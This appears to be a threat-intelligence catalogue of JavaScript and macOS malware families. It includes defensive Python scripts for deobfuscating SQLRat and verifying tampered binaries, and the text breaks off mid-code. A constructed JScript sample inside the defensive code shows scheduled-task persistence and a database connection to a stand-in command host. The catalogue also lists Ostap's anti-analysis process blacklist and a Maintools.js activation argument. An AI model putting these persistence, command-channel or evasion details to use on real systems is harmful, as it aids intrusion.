- https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/ - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish - webarchive
- https://blog.morphisec.com/cobalt-gang-2.0 - webarchive
- https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware - webarchive
- https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw - webarchive
- https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing - webarchive
- https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/ - webarchive
- https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1 - webarchive
- https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire - webarchive
- https://attack.mitre.org/software/S0284/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NanHaiShu
NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.
Internal MISP references
UUID 3e46af39-52e8-442f-aff1-38eeb90336fc
which can be used as unique global reference for NanHaiShu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu - webarchive
- https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering - webarchive
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets - webarchive
- https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf - webarchive
- https://attack.mitre.org/software/S0228/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NodeRAT
Internal MISP references
UUID e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed
which can be used as unique global reference for NodeRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat - webarchive
- https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/ - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OFFODE
According to the author, this is a project intended to demonstrate bypassing multi-factor authentication (MFA) on an Outlook account. It is built in Node.js and uses Playwright for the browser automation in the backend.
Internal MISP references
UUID 0be6d248-382a-48b8-9a52-dba08aaa891e
which can be used as unique global reference for OFFODE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ostap
Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI for the running processes and check them against a blacklist:
- AgentSimulator.exe
- anti-virus.EXE
- BehaviorDumper
- BennyDB.exe
- ctfmon.exe
- fakepos_bin
- FrzState2k
- gemu-ga.exe (possibly a misspelling of qemu-ga.exe, the QEMU hypervisor's guest agent)
- ImmunityDebugger.exe
- KMS Server Service.exe
- ProcessHacker
- procexp
- Proxifier.exe
- python
- tcpdump
- VBoxService
- VBoxTray.exe
- VmRemoteGuest
- vmtoolsd
- VMware2B.exe
- VzService.exe
- winace
- Wireshark
If a blacklisted process is found, the malware terminates.
Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.
Internal MISP references
UUID a3b93781-c51c-4ccb-a856-804331470a9d
which can be used as unique global reference for ostap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap - webarchive
- https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/ - webarchive
- https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter - webarchive
- https://www.intrinsec.com/deobfuscating-hunting-ostap/ - webarchive
- https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ParaSiteSnatcher
Internal MISP references
UUID 9af9557c-04fc-4231-85c4-d1fb30c53cb6
which can be used as unique global reference for ParaSiteSnatcher
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Parrot TDS
Parrot TDS is malicious JavaScript used as a Traffic Direction System (TDS). It shows similarities to the Prometheus TDS. According to Avast's Decoded blog, it has been active since October 2021.
Internal MISP references
UUID dbefad0a-29d3-49d3-b925-116598182dee
which can be used as unique global reference for Parrot TDS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PeaceNotWar
PeaceNotWar was integrated into the Node.js module node-ipc as malware/protestware with wiper characteristics. It targets machines whose public IP address geolocates to Russia or Belarus and recursively overwrites files with a heart emoji.
Internal MISP references
UUID 6c304481-024e-4f34-af06-6235edacfdcc
which can be used as unique global reference for PeaceNotWar
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar - webarchive
- https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c - webarchive
- https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers - webarchive
- https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PindOS
Internal MISP references
UUID 6af1eb7a-bc54-43af-9e15-7187a5f250c4
which can be used as unique global reference for PindOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Powmet
Internal MISP references
UUID 9521ceb0-039d-412c-a38b-7bd9ddfc772e
which can be used as unique global reference for Powmet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QNodeService
According to Trend Micro, this is Node.js-based malware that can download, upload and execute files, steal credentials from the Chrome and Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32- and 64-bit systems.
Internal MISP references
UUID 52d9260f-f090-4e79-b0b3-0c89f5db6bc6
which can be used as unique global reference for QNodeService
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUICKCAFE
QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.
Internal MISP references
UUID 475766d2-1e99-4d81-89e4-0d0df4a562d0
which can be used as unique global reference for QUICKCAFE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
scanbox
Internal MISP references
UUID 0a13a546-91a2-4de0-9bbb-71c9233ce6fa
which can be used as unique global reference for scanbox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox - webarchive
- https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/ - webarchive
- http://resources.infosecinstitute.com/scanbox-framework/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SQLRat
SQLRat campaigns typically involve a lure document that includes an image overlaid by a VB form trigger. Once a user double-clicks the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two scheduled task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file, mspromo.dot. The file uses a character-insertion obfuscation technique that makes it appear to contain Chinese characters; once the inserted characters are removed, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on the host. The SQLRat script makes a direct SQL connection to a Microsoft SQL Server database controlled by the attackers and executes the contents of various tables. Because tasking arrives over a database connection rather than HTTP, detection should cover outbound TDS (TCP/1433 by default) from user workstations, which rarely have a legitimate reason to reach an external SQL Server.
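The character-insertion layer described above is cheap to undo once you know the real script is plain ASCII and the filler is not. The script below is an added example, not SQLRat code or any vendor's deobfuscator: it builds a constructed sample by interleaving CJK filler with a small JScript stand-in for mspromo.dot, strips everything outside printable ASCII, and then pulls persistence, file-drop and database-connection strings out of the cleaned script. The assumption that all filler lies outside printable ASCII is the one stated in the description; the sample script, host name and credentials are made up.

```python
"""Undo character-insertion obfuscation and extract indicator strings.
Added example; the obfuscated sample is constructed here."""
import re
from typing import Dict, List

# Filler we assume the obfuscator inserted: CJK Unified Ideographs.
FILLER = [chr(0x4E00 + i) for i in range(0, 200, 7)]


def obfuscate_char_insertion(script: str) -> str:
    """Constructed helper for the demo: one filler char after each real char."""
    out = []
    for i, ch in enumerate(script):
        out.append(ch)
        out.append(FILLER[i % len(FILLER)])
    return "".join(out)


def deobfuscate_char_insertion(blob: str) -> str:
    """Keep printable ASCII plus CR/LF/TAB and drop everything else.

    Caveat: legitimate non-ASCII inside string literals is dropped as well,
    so diff the result against the input before trusting a cleaned script.
    """
    return "".join(ch for ch in blob if 0x20 <= ord(ch) < 0x7F or ch in "\r\n\t")


_STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
_INTERESTING = re.compile(
    r"(schtasks|%appdata%|Templates|\.dot\b|WScript\.Shell|ADODB|Provider=|"
    r"Data Source=|https?://)",
    re.IGNORECASE,
)


def extract_indicators(script: str) -> Dict[str, List[str]]:
    """Return string literals that look like persistence, drop-path or SQL
    connection indicators, plus every named function in the script."""
    literals = [a or b for a, b in _STRING_LITERAL.findall(script)]
    return {
        "indicators": [s for s in literals if _INTERESTING.search(s)],
        "functions": re.findall(r"\bfunction\s+([A-Za-z_$][\w$]*)", script),
    }


# Constructed stand-in for the deobfuscated script: scheduled-task
# persistence, a Templates drop path and an ADODB connection to MSSQL.
DEMO_SCRIPT = (
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'var dst = sh.ExpandEnvironmentStrings("%appdata%") + "\\\\Microsoft\\\\Templates\\\\mspromo.dot";\n'
    'function persist() { sh.Run("schtasks /create /sc daily /tn Updater /tr " + dst, 0); }\n'
    'function fetchCmds() { var c = new ActiveXObject("ADODB.Connection");'
    ' c.Open("Provider=SQLOLEDB;Data Source=db.example.invalid;User ID=u;Password=p"); }\n'
)
DEMO_OBFUSCATED = obfuscate_char_insertion(DEMO_SCRIPT)


def demo() -> Dict[str, object]:
    cleaned = deobfuscate_char_insertion(DEMO_OBFUSCATED)
    return {"roundtrip_ok": cleaned == DEMO_SCRIPT, **extract_indicators(cleaned)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real sample, run `deobfuscate_char_insertion` over the file contents and feed the result to `extract_indicators`; the `Data Source=` value is the database host to block and hunt for in proxy and firewall logs.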
Internal MISP references
UUID d51cb8f8-cca3-46ce-a05d-052df44aef40
which can be used as unique global reference for SQLRat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Starfighter (Javascript)
According to the author, this is a JavaScript-based Empire launcher that ships its own embedded PowerShell host, so it does not depend on PowerShell being available locally. As a consequence, detections keyed on powershell.exe process creation will not fire; look instead for a script host process loading the .NET runtime and the PowerShell automation assembly.
Internal MISP references
UUID f6c80748-1cce-4f6b-92e9-f8a04ff3464a
which can be used as unique global reference for Starfighter (Javascript)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Swid
Internal MISP references
UUID d4be22cf-497d-46a0-8d57-30d10d9486e3
which can be used as unique global reference for Swid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HTML5 Encoding
Internal MISP references
UUID c7ab9e5a-0ec9-481e-95ec-ad08f06cf985
which can be used as unique global reference for HTML5 Encoding
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/ - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Maintools.js
Expects a parameter to run: it must be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'. A sandbox or analyst that launches the script without that argument will not reach the payload, so pass it when detonating.
Internal MISP references
UUID 218f8ca8-1124-4e44-8fbd-4b05b46bde4b
which can be used as unique global reference for Maintools.js
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified JS 001 (APT32 Profiler)
Internal MISP references
UUID f2b0ffdc-7d4e-4786-8935-e7036faa174d
which can be used as unique global reference for Unidentified JS 001 (APT32 Profiler)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified JS 003 (Emotet Downloader)
According to Max Kersten, Emotet is dropped by a procedure spanning multiple stages. The first stage is an Office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript; the JavaScript variant is this family entry.
Internal MISP references
UUID 7bf28be0-3153-474d-8df7-e12fec511d7e
which can be used as unique global reference for Unidentified JS 003 (Emotet Downloader)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified JS 004
A simple loader written in JavaScript found by Marco Ramilli.
Internal MISP references
UUID a15e7c49-4eb6-46f0-8f79-0b765d7d4e46
which can be used as unique global reference for Unidentified JS 004
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified JS 005 (Stealer)
Internal MISP references
UUID a797e9b9-cb3f-484a-9273-ac73e9ea1e06
which can be used as unique global reference for Unidentified JS 005 (Stealer)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified JS 006 (Winter Wyvern)
A script able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests.
Internal MISP references
UUID 547fed09-38d0-4813-b9b0-870a1d4136df
which can be used as unique global reference for Unidentified JS 006 (Winter Wyvern)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified JS 002
Internal MISP references
UUID 7144063f-966b-4277-b316-00eb970ccd52
which can be used as unique global reference for Unidentified JS 002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Valak
According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that the cyber criminals behind Valak use it to cause chain infections, i.e., to distribute other malware.
Research shows that Valak is distributed through spam campaigns; in some cases, however, it infiltrates systems that are already infected with other malicious programs such as Ursnif (also known as Gozi).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Valak.
Known Synonyms |
---|
Valek |
Internal MISP references
UUID b37b4d91-0ac7-48f5-8fd1-5237b9615cf7
which can be used as unique global reference for Valak
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.valak - webarchive
- https://security-soup.net/analysis-of-valak-maldoc/ - webarchive
- https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/ - webarchive
- https://unit42.paloaltonetworks.com/valak-evolution/ - webarchive
- https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/ - webarchive
- https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html - webarchive
- https://threatresearch.ext.hp.com/detecting-ta551-domains/ - webarchive
- https://blog.talosintelligence.com/2020/07/valak-emerges.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/monsterlibra/ - webarchive
- https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7 - webarchive
- https://twitter.com/malware_traffic/status/1207824548021886977 - webarchive
- https://www.cybereason.com/blog/valak-more-than-meets-the-eye - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
witchcoven
Internal MISP references
UUID dcc0fad2-29a9-4b69-9d75-d288ca458bc7
which can be used as unique global reference for witchcoven
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Godzilla Webshell
Internal MISP references
UUID 07e88ccf-6027-412b-99bf-0fa1d3cfb174
which can be used as unique global reference for Godzilla Webshell
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell - webarchive
- https://blog.gigamon.com/2022/09/28/investigating-web-shells/ - webarchive
- https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ - webarchive
- https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat - webarchive
- https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
3CX Backdoor (OS X)
Internal MISP references
UUID d5e10bf9-9de8-46be-96d0-aa502b14ffe8
which can be used as unique global reference for 3CX Backdoor (OS X)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AMOS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AMOS.
Known Synonyms |
---|
Atomic macOS Stealer |
Internal MISP references
UUID 2fa2be52-e44f-4998-bde7-c66cfb6f4521
which can be used as unique global reference for AMOS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.amos - webarchive
- https://securelist.com/crimeware-report-fakesg-akira-amos/111483/ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version - webarchive
- https://spycloud.com/blog/reverse-engineering-atomic-macos-stealer/ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising - webarchive
- https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/ - webarchive
- https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/ - webarchive
- https://russianpanda.com/2024/01/15/Atomic-Stealer-AMOS/ - webarchive
- https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AppleJeus (OS X)
According to PCrisk, AppleJeus is the name of backdoor malware distributed by the Lazarus group. They spread this malicious software through a fake cryptocurrency trading application called Celas Trade Pro.
Internal MISP references
UUID ca466f15-8e0a-4030-82cb-5382e3c56ee5
which can be used as unique global reference for AppleJeus (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment - webarchive
- https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-048a - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c - webarchive
- https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g - webarchive
- https://objective-see.com/blog/blog_0x5F.html - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f - webarchive
- https://www.youtube.com/watch?v=rjA0Vf75cYk - webarchive
- https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56 - webarchive
- https://securelist.com/operation-applejeus/87553/ - webarchive
- https://objective-see.com/blog/blog_0x54.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e - webarchive
- https://www.youtube.com/watch?v=1NkzTKkEM2k - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://securelist.com/operation-applejeus-sequel/95596/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a - webarchive
- https://objective-see.com/blog/blog_0x49.html - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BANSHEE
Internal MISP references
UUID 5d7b9bcf-a0b6-47eb-8350-a80fac356567
which can be used as unique global reference for BANSHEE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bella
Internal MISP references
UUID 3c5036ad-2afc-4bc1-a5a3-b31797f46248
which can be used as unique global reference for Bella
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bundlore
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bundlore.
Known Synonyms |
---|
SurfBuyer |
Internal MISP references
UUID 5f5f5496-d9f8-4984-aa66-8702741646fe
which can be used as unique global reference for Bundlore
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore - webarchive
- https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20 - webarchive
- https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c - webarchive
- https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/ - webarchive
- https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Careto
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Careto.
Known Synonyms |
---|
Appetite |
Mask |
Internal MISP references
UUID dcabea75-a433-4157-bb7a-be76de3026ac
which can be used as unique global reference for Careto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Casso
Internal MISP references
UUID 387e1a19-458d-4961-a8e4-3f82463085e5
which can be used as unique global reference for Casso
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CDDS
Google TAG has observed this malware being delivered via watering hole attacks using 0-day exploits, targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDDS.
Known Synonyms |
---|
Macma |
Internal MISP references
UUID 5e4bdac7-b6c8-4c59-996f-babfc3bb3a3c
which can be used as unique global reference for CDDS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds - webarchive
- https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/ - webarchive
- https://objective-see.com/blog/blog_0x69.html - webarchive
- https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/ - webarchive
- https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Choziosi (OS X)
A loader delivering malicious Chrome and Safari extensions.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Choziosi (OS X).
Known Synonyms |
---|
ChromeLoader |
Chropex |
Internal MISP references
UUID 57f75f24-b77b-46b3-a06a-57d49374fb82
which can be used as unique global reference for Choziosi (OS X)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/osx.choziosi - webarchive
- https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension - webarchive
- https://www.th3protocol.com/2022/Choziosi-Loader - webarchive
- https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/ - webarchive
- https://redcanary.com/blog/chromeloader/ - webarchive
- https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CloudMensis
Internal MISP references
UUID 557fc183-f51a-4740-b2dd-5e81e6f6690a
which can be used as unique global reference for CloudMensis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CoinThief
CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.
It was spreading in early 2014 from several different sources:
- on GitHub (where the trojanized compiled binary did not match the displayed source code),
- on popular and trusted download sites like CNET's Download.com or MacUpdate.com, and
- as cracked applications via torrents, camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.
The patcher's role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted Bitcoin-Qt versions 0.8.0, 0.8.1 and 0.8.5. The earlier patch modified Bitcoin-Qt by adding malicious code that would send nearly all of the victim's Bitcoins to one of the hard-coded addresses belonging to the attacker.
The browser extensions targeted Chrome and Firefox and were disguised as a "Pop-up blocker". The extensions monitored visited websites, downloaded malicious JavaScript and injected it into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected scripts were able to modify transactions to redirect Bitcoin transfers to an attacker's address, or simply harvest login credentials for the targeted online service.
The backdoor enabled the attacker to take full control over the victim's computer:
- collect information about the infected computer
- execute arbitrary shell scripts on the target computer
- upload an arbitrary file from the victim's hard drive to a remote server
- update itself to a newer version
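Both the GitHub distribution (a compiled binary that did not match the displayed source) and the patcher (a silently modified Bitcoin-Qt) are caught by the same control: compare the binary you are about to run against a digest published out of band, and when it differs, find out where. The script below is an added example, not CoinThief code or any ESET tool; the "binaries" and the manifest are constructed byte strings, with an embedded address standing in for the kind of hard-coded destination a patcher would overwrite.

```python
"""Verify a binary against a hash manifest and locate patched byte ranges.
Added example; the binaries and manifest below are constructed."""
import hashlib
from typing import Dict, List, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_against_manifest(name: str, data: bytes, manifest: Dict[str, str]) -> bool:
    """True only if `name` is listed in the manifest and its digest matches."""
    expected = manifest.get(name)
    return expected is not None and expected == sha256_hex(data)


def diff_ranges(good: bytes, suspect: bytes) -> List[Tuple[int, int]]:
    """Return half-open [start, end) byte ranges where `suspect` differs from
    `good`; a length difference is reported as a trailing range."""
    ranges: List[Tuple[int, int]] = []
    start = None
    n = min(len(good), len(suspect))
    for i in range(n):
        if good[i] != suspect[i]:
            if start is None:
                start = i
        elif start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, n))
    if len(good) != len(suspect):
        ranges.append((n, max(len(good), len(suspect))))
    return ranges


# Constructed stand-ins: a "clean" build with an embedded destination address,
# and a copy where a patcher has overwritten that address in place.
GOOD_BINARY = (b"BITCOIN-QT-DEMO\x00" + b"\x90" * 64
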